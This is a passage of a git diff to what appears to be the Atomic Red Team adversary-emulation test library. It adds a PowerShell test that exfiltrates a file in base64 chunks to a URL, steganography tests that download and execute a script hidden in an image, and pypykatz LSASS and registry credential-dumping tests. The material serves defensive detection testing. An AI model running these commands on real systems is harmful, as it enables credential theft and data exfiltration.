+          description: Path to the folder for the tactics venv
+          type: string
+          default: PathToAtomicsFolder\..\ExternalPayloads\venv_t1018
       dependency_executor_name: powershell
       dependencies:
       - description: 'Computer must have python 3 installed
 
           '
-        prereq_command: 'if (python --version) {exit 0} else {exit 1}
+        prereq_command: 'if (Get-Command py -errorAction SilentlyContinue) { exit
+          0 } else { exit 1 }
 
           '
         get_prereq_command: |
           New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction ignore -Force | Out-Null
           invoke-webrequest "https://www.python.org/ftp/python/3.10.4/python-3.10.4-amd64.exe" -outfile "PathToAtomicsFolder\..\ExternalPayloads\python_setup.exe"
           Start-Process -FilePath "PathToAtomicsFolder\..\ExternalPayloads\python_setup.exe" -ArgumentList "/quiet InstallAllUsers=1 PrependPath=1 Include_test=0" -Wait
-      - description: 'Computer must have pip installed
+      - description: 'Computer must have venv configured at #{venv_path}
 
           '
-        prereq_command: 'if (pip3 -V) {exit 0} else {exit 1}
+        prereq_command: 'if (Test-Path -Path "#{venv_path}" ) { exit 0 } else { exit
+          1 }
 
           '
-        get_prereq_command: "New-Item -Type Directory \"PathToAtomicsFolder\\..\\ExternalPayloads\\\"
-          -ErrorAction ignore -Force | Out-Null\ninvoke-webrequest \"https://bootstrap.pypa.io/ez_setup.py\"
-          -outfile \"PathToAtomicsFolder\\..\\ExternalPayloads\\ez_setup.py\"      \ninvoke-webrequest
-          \"https://bootstrap.pypa.io/get-pip.py\" -outfile \"PathToAtomicsFolder\\..\\ExternalPayloads\\get-pip.py\"\ncmd
-          /c \"PathToAtomicsFolder\\..\\ExternalPayloads\\ez_setup.py\"\ncmd /c \"PathToAtomicsFolder\\..\\ExternalPayloads\\get-pip.py\"\n"
-      - description: 'adidnsdump must be installed and part of PATH
+        get_prereq_command: 'py -m venv "#{venv_path}"
 
           '
-        prereq_command: 'if (cmd /c adidnsdump -h) {exit 0} else {exit 1}
+      - description: 'adidnsdump must be installed
 
           '
-        get_prereq_command: 'pip3 install adidnsdump
+        prereq_command: 'if (Get-Command "#{venv_path}\Scripts\adidnsdump" -errorAction
+          SilentlyContinue) { exit 0 } else { exit 1 }
+
+          '
+        get_prereq_command: '& "#{venv_path}\Scripts\pip.exe" install --no-cache-dir
+          adidnsdump 2>&1 | Out-Null
 
           '
       executor:
-        command: 'adidnsdump -u #{user_name} -p #{acct_pass} --print-zones #{host_name}
+        command: '"#{venv_path}\Scripts\adidnsdump" -u #{user_name} -p #{acct_pass}
+          --print-zones #{host_name}
 
           '
         name: command_prompt
@@ -81087,7 +81883,8 @@ discovery:
       - description: 'Check if python exists on the machine
 
           '
-        prereq_command: 'if (python --version) {exit 0} else {exit 1}
+        prereq_command: 'if (Get-Command py -errorAction SilentlyContinue) { exit
+          0 } else { exit 1 }
 
           '
         get_prereq_command: |
@@ -92032,7 +92829,39 @@ exfiltration:
       - 'Network Traffic: Network Traffic Flow'
       x_mitre_is_subtechnique: false
       identifier: T1030
-    atomic_tests: []
+    atomic_tests:
+    - name: Network-Based Data Transfer in Small Chunks
+      auto_generated_guid: f0287b58-f4bc-40f6-87eb-692e126e7f8f
+      description: Simulate transferring data over a network in small chunks to evade
+        detection.
+      supported_platforms:
+      - windows
+      input_arguments:
+        source_file_path:
+          description: Path to the source file to transfer.
+          type: path
+          default: "[User specified]"
+        destination_url:
+          description: URL of the destination server.
+          type: url
+          default: http://example.com
+        chunk_size:
+          description: Size of each data chunk (in KB).
+          type: integer
+          default: 1024
+      executor:
+        name: powershell
+        elevation_required: false
+        command: |
+          $file = [System.IO.File]::OpenRead(#{source_file_path})
+          $chunkSize = #{chunk_size} * 1KB
+          $buffer = New-Object Byte[] $chunkSize
+
+          while ($bytesRead = $file.Read($buffer, 0, $buffer.Length)) {
+              $encodedChunk = [Convert]::ToBase64String($buffer, 0, $bytesRead)
+              Invoke-WebRequest -Uri #{destination_url} -Method Post -Body $encodedChunk
+          }
+          $file.Close()
   T1537:
     technique:
       x_mitre_platforms:
diff --git a/atomics/T1001.002/T1001.002.md b/atomics/T1001.002/T1001.002.md
new file mode 100644
index 00000000..5425d360
--- /dev/null
+++ b/atomics/T1001.002/T1001.002.md
@@ -0,0 +1,197 @@
+# T1001.002 - Data Obfuscation via Steganography
+## [Description from ATT&CK](https://attack.mitre.org/techniques/T1001/002)
+<blockquote>Adversaries may use steganographic techniques to hide command and control traffic to make detection efforts more difficult. Steganographic techniques can be used to hide data in digital messages that are transferred between systems. This hidden information can be used for command and control of compromised systems. In some cases, the passing of files embedded using steganography, such as image or document files, can be used for command and control. </blockquote>
+
+## Atomic Tests
+
+- [Atomic Test #1 - Steganographic Tarball Embedding](#atomic-test-1---steganographic-tarball-embedding)
+
+- [Atomic Test #2 - Embedded Script in Image Execution via Extract-Invoke-PSImage](#atomic-test-2---embedded-script-in-image-execution-via-extract-invoke-psimage)
+
+
+<br/>
+
+## Atomic Test #1 - Steganographic Tarball Embedding
+This atomic test, named "Steganographic Tarball Embedding", simulates the technique of data obfuscation via steganography by embedding a tar archive file (tarball) 
+within an image.
+
+The test begins by ensuring the availability of the image file and the tarball file containing data . It then generates random passwords and saves them to a 
+file. Subsequently, the tarball file is created, containing the passwords file. The test executor command reads the contents of the image 
+file and the tarball file as byte arrays and appends them together to form a new image file. This process effectively embeds the tarball 
+file within the image, utilizing steganography techniques for data obfuscation.
+
+This atomic test simulates the technique of data obfuscation via steganography, enabling attackers to clandestinely transfer files across systems undetected. 
+By embedding the tarball file within the image, adversaries can obscure their activities, facilitating covert communication and data exfiltration.
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** c7921449-8b62-4c4d-8a83-d9281ac0190b
+
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| image_file | Image file which will be downloaded to be used to hide data | path | PathToAtomicsFolder&#92;T1001.002&#92;bin&#92;T1001.002.jpg|
+| tar_file | Tarz file containing random passwords | path | $env:PUBLIC&#92;Downloads&#92;T1001.002.tarz|
+| new_image_file | new image file ready for extraction | path | $env:PUBLIC&#92;Downloads&#92;T1001.002New.jpg|
+| passwords_file | Text file containing random passwords | path | $env:TEMP&#92;random_passwords.txt|
+
+
+#### Attack Commands: Run with `powershell`!  Elevation Required (e.g. root or admin) 
+
+
+```powershell
+Get-Content "#{image_file}", "#{tar_file}" -Encoding byte -ReadCount 0 | Set-Content "#{new_image_file}" -Encoding byte
+```
+
+#### Cleanup Commands:
+```powershell
+Set-ExecutionPolicy Bypass -Scope Process -Force -ErrorAction Ignore
+Remove-Item -Path "#{new_image_file}" -Force -ErrorAction Ignore
+```
+
+
+
+#### Dependencies:  Run with `powershell`!
+##### Description: Image file must exist
+##### Check Prereq Commands:
+```powershell
+if (!(Test-Path "#{image_file}")) {exit 1} else {
+{exit 0}
+}
+```
+##### Get Prereq Commands:
+```powershell
+New-Item -Type Directory (split-path "#{image_file}") -ErrorAction ignore | Out-Null
+Write-Output "Downloading image file..."
+$imageUrl = "https://github.com/raghavsingh7/Pictures/raw/a9617d9fce289909441120a1e0366315c2c5e19d/lime.jpg"
+Invoke-WebRequest -Uri $imageUrl -OutFile "#{image_file}"
+```
+##### Description: File to hide within tarz file must exist
+##### Check Prereq Commands:
+```powershell
+if (!(Test-Path "#{passwords_file}")) {exit 1} else {
+{exit 0}
+}
+```
+##### Get Prereq Commands:
+```powershell
+Write-Output "Generating random passwords and saving to file..."
+$passwords = 1..10 | ForEach-Object { Get-Random -InputObject ('ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789!@#$%^&*()-_=+[]{}|;:,.<>?') -Count 12 }
+$passwords | Out-File -FilePath "#{passwords_file}"
+```
+##### Description: Tarz file to embed in image must exist
+##### Check Prereq Commands:
+```powershell
+if (!(Test-Path "#{tar_file}")) {exit 1} else {
+{exit 0}
+}
+```
+##### Get Prereq Commands:
+```powershell
+Write-Output "Generating tarz file..."
+tar -cvf "#{tar_file}" "#{passwords_file}"
+```
+
+
+
+
+<br/>
+<br/>
+
+## Atomic Test #2 - Embedded Script in Image Execution via Extract-Invoke-PSImage
+This atomic test demonstrates the technique of data obfuscation via steganography, where a PowerShell script is concealed within an image file. 
+The PowerShell script is embedded using steganography techniques, making it undetectable by traditional security measures. The script is hidden 
+within the pixels of the image, enabling attackers to covertly transfer and execute malicious code across systems.
+
+The test begins by ensuring the availability of the malicious image file and the Extract-Invoke-PSImage script. The test proceeds to extract the hidden 
+PowerShell script (decoded.ps1) from the image file using the Extract-Invoke-PSImage tool. The extracted script is then decoded from base64 encoding and saved as a 
+separate PowerShell (textExtraction.ps1). Consequently, the textExtraction.ps1 script is executed.
+
+In the case of this atomic test, the malicious image file which is downloaded has the powershell command Start-Process notepad embedded within in base64. This
+is done to emulate an attackers behaviour in the case they were to execute malware embedded within the image file.
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** 04bb8e3d-1670-46ab-a3f1-5cee64da29b6
+
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| image_file | Malicious Image file which will be downloaded | path | PathToAtomicsFolder&#92;T1001.002&#92;bin&#92;evil_kitten.jpg|
+| psimage_script | Extract-Invoke-PSImage Script downloaded | path | PathToAtomicsFolder&#92;ExternalPayloads&#92;Extract-Invoke-PSImage.ps1|
+
+
+#### Attack Commands: Run with `powershell`!  Elevation Required (e.g. root or admin) 
+
+
+```powershell
+cd "PathToAtomicsFolder\ExternalPayloads\"
+Import-Module .\Extract-Invoke-PSImage.ps1
+$extractedScript=Extract-Invoke-PSImage -Image "#{image_file}" -Out "$HOME\result.ps1"
+$scriptContent = Get-Content "$HOME\result.ps1" -Raw
+$base64Pattern = "(?<=^|[^A-Za-z0-9+/])(?:[A-Za-z0-9+/]{4})*(?:[A-Za-z0-9+/]{2}(==)?|[A-Za-z0-9+/]{3}=)?(?=$|[^A-Za-z0-9+/])"
+$base64Strings = [regex]::Matches($scriptContent, $base64Pattern) | ForEach-Object { $_.Value }
+$base64Strings | Set-Content "$HOME\decoded.ps1"
+$decodedContent = Get-Content "$HOME\decoded.ps1" -Raw
+$decodedText = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($decodedContent))
+$textPattern = '^.+'  
+$textMatches = [regex]::Matches($decodedText, $textPattern) | ForEach-Object { $_.Value }
+$scriptPath = "$HOME\textExtraction.ps1"
+$textMatches -join '' | Set-Content -Path $scriptPath
+. "$HOME\textExtraction.ps1"
+```
+
+#### Cleanup Commands:
+```powershell
+Set-ExecutionPolicy Bypass -Scope Process -Force -ErrorAction Ignore
+Remove-Item -Path "$HOME\result.ps1" -Force -ErrorAction Ignore 
+Remove-Item -Path "$HOME\textExtraction.ps1" -Force -ErrorAction Ignore
+Remove-Item -Path "$HOME\decoded.ps1" -Force -ErrorAction Ignore
+```
+
+
+
+#### Dependencies:  Run with `powershell`!
+##### Description: Image file must exist
+##### Check Prereq Commands:
+```powershell
+if (!(Test-Path "#{image_file}")) {exit 1} else {
+{exit 0}
+}
+```
+##### Get Prereq Commands:
+```powershell
+New-Item -Type Directory (split-path "#{image_file}") -ErrorAction Ignore | Out-Null
+Write-Output "Downloading image file..."
+$imageUrl = "https://github.com/raghavsingh7/Pictures/raw/f73e7686cdd848ed06e63af07f6f1a5e72de6320/evil_kitten.jpg"
+Invoke-WebRequest -Uri $imageUrl -OutFile #{image_file}
+```
+##### Description: Extract-Invoke-PSImage must exist
+##### Check Prereq Commands:
+```powershell
+if (!(Test-Path "#{psimage_script}")) {exit 1} else {
+{exit 0}
+}
+```
+##### Get Prereq Commands:
+```powershell
+New-Item -Path "PathToAtomicsFolder\ExternalPayloads\" -ItemType Directory -Force | Out-Null
+Write-Output "Downloading Extract-Invoke-PSImage.ps1 script..."
+$scriptUrl = "https://github.com/raghavsingh7/Extract-Invoke-PSImage/raw/7d8c165d2f9bfe9c3965181079b7c82e03168ce1/Extract-Invoke-PSImage.ps1"
+Invoke-WebRequest -Uri $scriptUrl -OutFile #{psimage_script}
+```
+
+
+
+
+<br/>
diff --git a/atomics/T1001.002/T1001.002.yaml b/atomics/T1001.002/T1001.002.yaml
new file mode 100644
index 00000000..de33960e
--- /dev/null
+++ b/atomics/T1001.002/T1001.002.yaml
@@ -0,0 +1,148 @@
+attack_technique: T1001.002
+display_name: "Data Obfuscation via Steganography"
+atomic_tests:
+  - name: Steganographic Tarball Embedding
+    auto_generated_guid: c7921449-8b62-4c4d-8a83-d9281ac0190b
+    description: |
+      This atomic test, named "Steganographic Tarball Embedding", simulates the technique of data obfuscation via steganography by embedding a tar archive file (tarball) 
+      within an image.
+      
+      The test begins by ensuring the availability of the image file and the tarball file containing data . It then generates random passwords and saves them to a 
+      file. Subsequently, the tarball file is created, containing the passwords file. The test executor command reads the contents of the image 
+      file and the tarball file as byte arrays and appends them together to form a new image file. This process effectively embeds the tarball 
+      file within the image, utilizing steganography techniques for data obfuscation.
+      
+      This atomic test simulates the technique of data obfuscation via steganography, enabling attackers to clandestinely transfer files across systems undetected. 
+      By embedding the tarball file within the image, adversaries can obscure their activities, facilitating covert communication and data exfiltration.
+    supported_platforms:
+      - windows
+    input_arguments:
+      image_file:
+        description: Image file which will be downloaded to be used to hide data
+        type: path
+        default: PathToAtomicsFolder\T1001.002\bin\T1001.002.jpg
+      tar_file:
+        description: Tarz file containing random passwords
+        type: path
+        default: $env:PUBLIC\Downloads\T1001.002.tarz
+      new_image_file:
+        description: new image file ready for extraction
+        type: path
+        default: $env:PUBLIC\Downloads\T1001.002New.jpg
+      passwords_file:
+        description: Text file containing random passwords
+        type: path
+        default: $env:TEMP\random_passwords.txt
+    dependency_executor_name: powershell
+    dependencies:
+      - description: |
+          Image file must exist
+        prereq_command: |
+          if (!(Test-Path "#{image_file}")) {exit 1} else {
+          {exit 0}
+          }
+        get_prereq_command: |
+          New-Item -Type Directory (split-path "#{image_file}") -ErrorAction ignore | Out-Null
+          Write-Output "Downloading image file..."
+          $imageUrl = "https://github.com/raghavsingh7/Pictures/raw/a9617d9fce289909441120a1e0366315c2c5e19d/lime.jpg"
+          Invoke-WebRequest -Uri $imageUrl -OutFile "#{image_file}"
+      - description: |
+          File to hide within tarz file must exist
+        prereq_command: |
+          if (!(Test-Path "#{passwords_file}")) {exit 1} else {
+          {exit 0}
+          }
+        get_prereq_command: |
+          Write-Output "Generating random passwords and saving to file..."
+          $passwords = 1..10 | ForEach-Object { Get-Random -InputObject ('ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789!@#$%^&*()-_=+[]{}|;:,.<>?') -Count 12 }
+          $passwords | Out-File -FilePath "#{passwords_file}"    
+      - description: |
+          Tarz file to embed in image must exist 
+        prereq_command: |
+          if (!(Test-Path "#{tar_file}")) {exit 1} else {
+          {exit 0}
+          }
+        get_prereq_command: |  
+          Write-Output "Generating tarz file..."
+          tar -cvf "#{tar_file}" "#{passwords_file}"
+    executor:
+      name: powershell
+      elevation_required: true
+      command: |
+        Get-Content "#{image_file}", "#{tar_file}" -Encoding byte -ReadCount 0 | Set-Content "#{new_image_file}" -Encoding byte
+      cleanup_command: |
+        Set-ExecutionPolicy Bypass -Scope Process -Force -ErrorAction Ignore
+        Remove-Item -Path "#{new_image_file}" -Force -ErrorAction Ignore
+
+  
+  - name: Embedded Script in Image Execution via Extract-Invoke-PSImage
+    auto_generated_guid: 04bb8e3d-1670-46ab-a3f1-5cee64da29b6
+    description: |
+      This atomic test demonstrates the technique of data obfuscation via steganography, where a PowerShell script is concealed within an image file. 
+      The PowerShell script is embedded using steganography techniques, making it undetectable by traditional security measures. The script is hidden 
+      within the pixels of the image, enabling attackers to covertly transfer and execute malicious code across systems.
+      
+      The test begins by ensuring the availability of the malicious image file and the Extract-Invoke-PSImage script. The test proceeds to extract the hidden 
+      PowerShell script (decoded.ps1) from the image file using the Extract-Invoke-PSImage tool. The extracted script is then decoded from base64 encoding and saved as a 
+      separate PowerShell (textExtraction.ps1). Consequently, the textExtraction.ps1 script is executed.
+
+      In the case of this atomic test, the malicious image file which is downloaded has the powershell command Start-Process notepad embedded within in base64. This
+      is done to emulate an attackers behaviour in the case they were to execute malware embedded within the image file. 
+    supported_platforms:
+      - windows
+    input_arguments:
+      image_file:
+        description: Malicious Image file which will be downloaded
+        type: path
+        default: PathToAtomicsFolder\T1001.002\bin\evil_kitten.jpg
+      psimage_script:
+        description: Extract-Invoke-PSImage Script downloaded
+        type: path
+        default: PathToAtomicsFolder\ExternalPayloads\Extract-Invoke-PSImage.ps1
+    dependency_executor_name: powershell
+    dependencies:
+      - description: |
+          Image file must exist
+        prereq_command: |
+          if (!(Test-Path "#{image_file}")) {exit 1} else {
+          {exit 0}
+          }
+        get_prereq_command: |
+          New-Item -Type Directory (split-path "#{image_file}") -ErrorAction Ignore | Out-Null
+          Write-Output "Downloading image file..."
+          $imageUrl = "https://github.com/raghavsingh7/Pictures/raw/f73e7686cdd848ed06e63af07f6f1a5e72de6320/evil_kitten.jpg"
+          Invoke-WebRequest -Uri $imageUrl -OutFile #{image_file}
+      - description: |
+          Extract-Invoke-PSImage must exist
+        prereq_command: |
+          if (!(Test-Path "#{psimage_script}")) {exit 1} else {
+          {exit 0}
+          }
+        get_prereq_command: |
+          New-Item -Path "PathToAtomicsFolder\ExternalPayloads\" -ItemType Directory -Force | Out-Null
+          Write-Output "Downloading Extract-Invoke-PSImage.ps1 script..."
+          $scriptUrl = "https://github.com/raghavsingh7/Extract-Invoke-PSImage/raw/7d8c165d2f9bfe9c3965181079b7c82e03168ce1/Extract-Invoke-PSImage.ps1"
+          Invoke-WebRequest -Uri $scriptUrl -OutFile #{psimage_script}
+    executor:
+      name: powershell
+      elevation_required: true
+      command: |
+        cd "PathToAtomicsFolder\ExternalPayloads\"
+        Import-Module .\Extract-Invoke-PSImage.ps1
+        $extractedScript=Extract-Invoke-PSImage -Image "#{image_file}" -Out "$HOME\result.ps1"
+        $scriptContent = Get-Content "$HOME\result.ps1" -Raw
+        $base64Pattern = "(?<=^|[^A-Za-z0-9+/])(?:[A-Za-z0-9+/]{4})*(?:[A-Za-z0-9+/]{2}(==)?|[A-Za-z0-9+/]{3}=)?(?=$|[^A-Za-z0-9+/])"
+        $base64Strings = [regex]::Matches($scriptContent, $base64Pattern) | ForEach-Object { $_.Value }
+        $base64Strings | Set-Content "$HOME\decoded.ps1"
+        $decodedContent = Get-Content "$HOME\decoded.ps1" -Raw
+        $decodedText = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($decodedContent))
+        $textPattern = '^.+'  
+        $textMatches = [regex]::Matches($decodedText, $textPattern) | ForEach-Object { $_.Value }
+        $scriptPath = "$HOME\textExtraction.ps1"
+        $textMatches -join '' | Set-Content -Path $scriptPath
+        . "$HOME\textExtraction.ps1"
+      cleanup_command: |
+        Set-ExecutionPolicy Bypass -Scope Process -Force -ErrorAction Ignore
+        Remove-Item -Path "$HOME\result.ps1" -Force -ErrorAction Ignore 
+        Remove-Item -Path "$HOME\textExtraction.ps1" -Force -ErrorAction Ignore
+        Remove-Item -Path "$HOME\decoded.ps1" -Force -ErrorAction Ignore
diff --git a/atomics/T1003.001/T1003.001.md b/atomics/T1003.001/T1003.001.md
index b184dcd6..c99c2456 100644
--- a/atomics/T1003.001/T1003.001.md
+++ b/atomics/T1003.001/T1003.001.md
@@ -363,6 +363,8 @@ Python 3 must be installed, use the get_prereq_command's to meet the prerequisit
 
 Successful execution of this test will display multiple usernames and passwords/hashes to the screen.
 
+Will create a Python virtual environment within the External Payloads folder that can be deleted manually post test execution.
+
 **Supported Platforms:** Windows
 
 
@@ -372,53 +374,55 @@ Successful execution of this test will display multiple usernames and passwords/
 
 
 
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| venv_path | Path to the folder for the tactics venv | string | PathToAtomicsFolder&#92;..&#92;ExternalPayloads&#92;venv_t1003_001|
+
 
 #### Attack Commands: Run with `command_prompt`!  Elevation Required (e.g. root or admin) 
 
 
 ```cmd
-pypykatz live lsa
+"#{venv_path}\Scripts\pypykatz" live lsa
+```
+
+#### Cleanup Commands:
+```cmd
+del "%temp%\nanodump.dmp" > nul 2> nul
 ```
 
 
 
-
-#### Dependencies:  Run with `command_prompt`!
+#### Dependencies:  Run with `powershell`!
 ##### Description: Computer must have python 3 installed
 ##### Check Prereq Commands:
-```cmd
-py -3 --version >nul 2>&1
-exit /b %errorlevel%
+```powershell
+if (Get-Command py -errorAction SilentlyContinue) { exit 0 } else { exit 1 }
 ```
 ##### Get Prereq Commands:
-```cmd
+```powershell
 New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction ignore -Force | Out-Null
 invoke-webrequest "https://www.python.org/ftp/python/3.10.4/python-3.10.4-amd64.exe" -outfile "PathToAtomicsFolder\..\ExternalPayloads\python_setup.exe"
 Start-Process -FilePath "PathToAtomicsFolder\..\ExternalPayloads\python_setup.exe" -ArgumentList "/quiet InstallAllUsers=1 PrependPath=1 Include_test=0" -Wait
 ```
-##### Description: Computer must have pip installed
+##### Description: Computer must have venv configured at #{venv_path}
 ##### Check Prereq Commands:
-```cmd
-py -3 -m pip --version >nul 2>&1
-exit /b %errorlevel%
+```powershell
+if (Test-Path -Path "#{venv_path}") { exit 0 } else { exit 1 }
 ```
 ##### Get Prereq Commands:
-```cmd
-New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction ignore -Force | Out-Null
-invoke-webrequest "https://bootstrap.pypa.io/ez_setup.py" -outfile "PathToAtomicsFolder\..\ExternalPayloads\ez_setup.py"      
-invoke-webrequest "https://bootstrap.pypa.io/get-pip.py" -outfile "PathToAtomicsFolder\..\ExternalPayloads\get-pip.py"
-cmd /c "PathToAtomicsFolder\..\ExternalPayloads\ez_setup.py"
-cmd /c "PathToAtomicsFolder\..\ExternalPayloads\get-pip.py"
+```powershell
+py -m venv "#{venv_path}"
 ```
-##### Description: pypykatz must be installed and part of PATH
+##### Description: pypykatz must be installed
 ##### Check Prereq Commands:
-```cmd
-pypykatz -h >nul 2>&1
-exit /b %errorlevel%
+```powershell
+if (Get-Command "#{venv_path}\Scripts\pypykatz" -errorAction SilentlyContinue) { exit 0 } else { exit 1 }
 ```
 ##### Get Prereq Commands:
-```cmd
-pip install pypykatz
+```powershell
+& "#{venv_path}\Scripts\pip.exe" install --no-cache-dir pypykatz 2>&1 | Out-Null
 ```
 
 
diff --git a/atomics/T1003.001/T1003.001.yaml b/atomics/T1003.001/T1003.001.yaml
index 8ade3578..5b92a022 100644
--- a/atomics/T1003.001/T1003.001.yaml
+++ b/atomics/T1003.001/T1003.001.yaml
@@ -186,40 +186,43 @@ atomic_tests:
     Python 3 must be installed, use the get_prereq_command's to meet the prerequisites for this test.
 
     Successful execution of this test will display multiple usernames and passwords/hashes to the screen.
+
+    Will create a Python virtual environment within the External Payloads folder that can be deleted manually post test execution.
+
   supported_platforms:
   - windows
-  dependency_executor_name: command_prompt
+  input_arguments:
+    venv_path:
+      description: Path to the folder for the tactics venv
+      type: string
+      default: PathToAtomicsFolder\..\ExternalPayloads\venv_t1003_001
+  dependency_executor_name: powershell
   dependencies:
   - description: |
       Computer must have python 3 installed
     prereq_command: |
-      py -3 --version >nul 2>&1
-      exit /b %errorlevel%
+      if (Get-Command py -errorAction SilentlyContinue) { exit 0 } else { exit 1 }
     get_prereq_command: |
       New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction ignore -Force | Out-Null
       invoke-webrequest "https://www.python.org/ftp/python/3.10.4/python-3.10.4-amd64.exe" -outfile "PathToAtomicsFolder\..\ExternalPayloads\python_setup.exe"
       Start-Process -FilePath "PathToAtomicsFolder\..\ExternalPayloads\python_setup.exe" -ArgumentList "/quiet InstallAllUsers=1 PrependPath=1 Include_test=0" -Wait
   - description: |
-      Computer must have pip installed
+      Computer must have venv configured at #{venv_path}
     prereq_command: |
-      py -3 -m pip --version >nul 2>&1
-      exit /b %errorlevel%
+      if (Test-Path -Path "#{venv_path}") { exit 0 } else { exit 1 }
     get_prereq_command: |
-      New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction ignore -Force | Out-Null
-      invoke-webrequest "https://bootstrap.pypa.io/ez_setup.py" -outfile "PathToAtomicsFolder\..\ExternalPayloads\ez_setup.py"      
-      invoke-webrequest "https://bootstrap.pypa.io/get-pip.py" -outfile "PathToAtomicsFolder\..\ExternalPayloads\get-pip.py"
-      cmd /c "PathToAtomicsFolder\..\ExternalPayloads\ez_setup.py"
-      cmd /c "PathToAtomicsFolder\..\ExternalPayloads\get-pip.py"
+      py -m venv "#{venv_path}"
   - description: |
-      pypykatz must be installed and part of PATH
+      pypykatz must be installed 
     prereq_command: |
-      pypykatz -h >nul 2>&1
-      exit /b %errorlevel%
+      if (Get-Command "#{venv_path}\Scripts\pypykatz" -errorAction SilentlyContinue) { exit 0 } else { exit 1 }
     get_prereq_command: |
-      pip install pypykatz
+      & "#{venv_path}\Scripts\pip.exe" install --no-cache-dir pypykatz 2>&1 | Out-Null
   executor:
     command: |
-      pypykatz live lsa
+      "#{venv_path}\Scripts\pypykatz" live lsa 
+    cleanup_command: |
+      del "%temp%\nanodump.dmp" > nul 2> nul
     name: command_prompt
     elevation_required: true
 - name: Dump LSASS.exe Memory using Out-Minidump.ps1
diff --git a/atomics/T1003.002/T1003.002.md b/atomics/T1003.002/T1003.002.md
index 60225974..ee918796 100644
--- a/atomics/T1003.002/T1003.002.md
+++ b/atomics/T1003.002/T1003.002.md
@@ -82,7 +82,9 @@ del %temp%\security >nul 2> nul
 <br/>
 
 ## Atomic Test #2 - Registry parse with pypykatz
-Parses registry hives to obtain stored credentials
+Parses registry hives to obtain stored credentials.
+
+Will create a Python virtual environment within the External Payloads folder that can be deleted manually post test execution.
 
 **Supported Platforms:** Windows
 
@@ -93,47 +95,51 @@ Parses registry hives to obtain stored credentials
 
 
 
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| venv_path | Path to the folder for the tactics venv | string | PathToAtomicsFolder&#92;..&#92;ExternalPayloads&#92;venv_t1003_002|
+
 
 #### Attack Commands: Run with `command_prompt`!  Elevation Required (e.g. root or admin) 
 
 
 ```cmd
-pypykatz live registry
+"#{venv_path}\Scripts\pypykatz" live lsa
 ```
 
 
 
 
-#### Dependencies:  Run with `command_prompt`!
+#### Dependencies:  Run with `powershell`!
 ##### Description: Computer must have python 3 installed
 ##### Check Prereq Commands:
-```cmd
-py -3 --version >nul 2>&1
-exit /b %errorlevel%
+```powershell
+if (Get-Command py -errorAction SilentlyContinue) { exit 0 } else { exit 1 }
 ```
 ##### Get Prereq Commands:
-```cmd
-echo "Python 3 must be installed manually"
+```powershell
+New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction ignore -Force | Out-Null
+invoke-webrequest "https://www.python.org/ftp/python/3.10.4/python-3.10.4-amd64.exe" -outfile "PathToAtomicsFolder\..\ExternalPayloads\python_setup.exe"
+Start-Process -FilePath "PathToAtomicsFolder\..\ExternalPayloads\python_setup.exe" -ArgumentList "/quiet InstallAllUsers=1 PrependPath=1 Include_test=0" -Wait
 ```
-##### Description: Computer must have pip installed
+##### Description: Computer must have venv configured at #{venv_path}
 ##### Check Prereq Commands:
-```cmd
-py -3 -m pip --version >nul 2>&1
-exit /b %errorlevel%
+```powershell
+if (Test-Path -Path "#{venv_path}") { exit 0 } else { exit 1 }
 ```
 ##### Get Prereq Commands:
-```cmd
-echo "PIP must be installed manually"
+```powershell
+py -m venv "#{venv_path}"
 ```
-##### Description: pypykatz must be installed and part of PATH
+##### Description: pypykatz must be installed
 ##### Check Prereq Commands:
-```cmd
-pypykatz -h >nul 2>&1
-exit /b %errorlevel%
+```powershell
+if (Get-Command "#{venv_path}\Scripts\pypykatz" -errorAction SilentlyContinue) { exit 0 } else { exit 1 }
 ```
 ##### Get Prereq Commands:
-```cmd
-pip install pypykatz
+```powershell
+& "#{venv_path}\Scripts\pip.exe" install --no-cache-dir pypykatz 2>&1 | Out-Null
 ```
 
 
diff --git a/atomics/T1003.002/T1003.002.yaml b/atomics/T1003.002/T1003.002.yaml
index 406889a5..5b7ea970 100644
--- a/atomics/T1003.002/T1003.002.yaml
+++ b/atomics/T1003.002/T1003.002.yaml
@@ -25,35 +25,41 @@ atomic_tests:
 - name: Registry parse with pypykatz
   auto_generated_guid: a96872b2-cbf3-46cf-8eb4-27e8c0e85263
   description: |
-    Parses registry hives to obtain stored credentials
+    Parses registry hives to obtain stored credentials.
+
+    Will create a Python virtual environment within the External Payloads folder that can be deleted manually post test execution.
   supported_platforms:
   - windows
-  dependency_executor_name: command_prompt
+  input_arguments:
+    venv_path:
+      description: Path to the folder for the tactics venv
+      type: string
+      default: PathToAtomicsFolder\..\ExternalPayloads\venv_t1003_002
+  dependency_executor_name: powershell
   dependencies:
   - description: |
       Computer must have python 3 installed
     prereq_command: |
-      py -3 --version >nul 2>&1
-      exit /b %errorlevel%
+      if (Get-Command py -errorAction SilentlyContinue) { exit 0 } else { exit 1 }
     get_prereq_command: |
-      echo "Python 3 must be installed manually"
+      New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction ignore -Force | Out-Null
+      invoke-webrequest "https://www.python.org/ftp/python/3.10.4/python-3.10.4-amd64.exe" -outfile "PathToAtomicsFolder\..\ExternalPayloads\python_setup.exe"
+      Start-Process -FilePath "PathToAtomicsFolder\..\ExternalPayloads\python_setup.exe" -ArgumentList "/quiet InstallAllUsers=1 PrependPath=1 Include_test=0" -Wait
   - description: |
-      Computer must have pip installed
